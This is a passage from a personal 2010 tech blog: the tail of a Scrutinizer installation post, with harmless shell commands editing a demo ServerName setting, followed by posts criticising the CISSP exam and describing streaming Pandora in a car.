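# Scratch copy standing in for Scrutinizer's httpd.conf
printf 'ServerName localhost:8080\n' > /tmp/httpd-demo.conf

# Swap in an externally resolvable name (hypothetical hostname)
sed -i 's/^ServerName .*/ServerName scrutinizer.example.com:8080/' /tmp/httpd-demo.conf

# Show the result
cat /tmp/httpd-demo.conf
```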

That completes the base installation; in future posts I'll go over how to configure Scrutinizer so you can get started with NetFlow analysis.

Wednesday, February 17, 2010

Impressions of CISSP

The CISSP is a certification governed by ISC2. It's an industry certification covering a broad range of information security topics. In most cases I've seen, prospective employers either require it or hold the certification in high esteem.

Having gone through the studying and the test itself, here are some brief facts:

  • The test consists of 250 multiple-choice questions.
  • Test takers have six hours to complete it.
  • The test consists of a booklet (containing the questions) and a Scantron sheet filled out with number-two pencils (yes, the same Scantron sheets used in grade school in the '80s and '90s).
  • The test costs $600 to take.
I found some very odd things about the test-taking procedure. For example, this is a six-hour test that you're expected to finish in one sitting. There was no coffee or sugar provided, so you need to be on top of your game for an awfully long time. As far as I could tell, food and drink were permitted, but no literature recommended that candidates bring any. Any test would be difficult to stay sharp for over that length of time, but when you're filling out multiple-choice questions for six hours straight, any brain will begin to fatigue as the letters all blend into one another.

ISC2 is a non-profit organization, so why am I paying $600 for a pencil-and-Scantron test? Where exactly does my money go? Also, for a security test I was never searched for electronic devices; if I had a cheat sheet on my phone, it wouldn't have been hard to put it in my lap had I chosen to do so. If the proctor was in fact watching, I could simply have excused myself to the restroom, as that was permitted as well...

My biggest complaint, though, is the actual content of the test. There are ten domains the prospective CISSP candidate is expected to master, yet the test was a farce compared to the daily experience of a security professional. I actually had one question where the correctness of the answer came down simply to whether I knew the difference between the words "objectivity" and "subjectivity". How in the world does that make me equipped to handle real-world incident response?

All in all, I think the CISSP needs some serious revamping to deliver the level of value one would expect from someone who carries the credential.

Oh, and don't expect to get your results in any short time frame: it took me nearly two months to find out I passed.

Monday, February 15, 2010

Pandora

If you are like me, you have A.D.D. I hate commercials with a passion, and I hate terrestrial radio nearly as much...

Long car rides can flare up my A.D.D., so I came up with a solution that made a recent four-hour car ride bearable.

Stopped off at the local Apple store and purchased an auxiliary cable that allows the iPhone to plug into compatible car stereos. I watched as the clerk scanned my debit card with a wireless scanner (that drove me mental, but I'll save that for another day).

Plugged my iPhone into the car stereo, configured my own Pandora station, and had commercial-free music for four straight hours...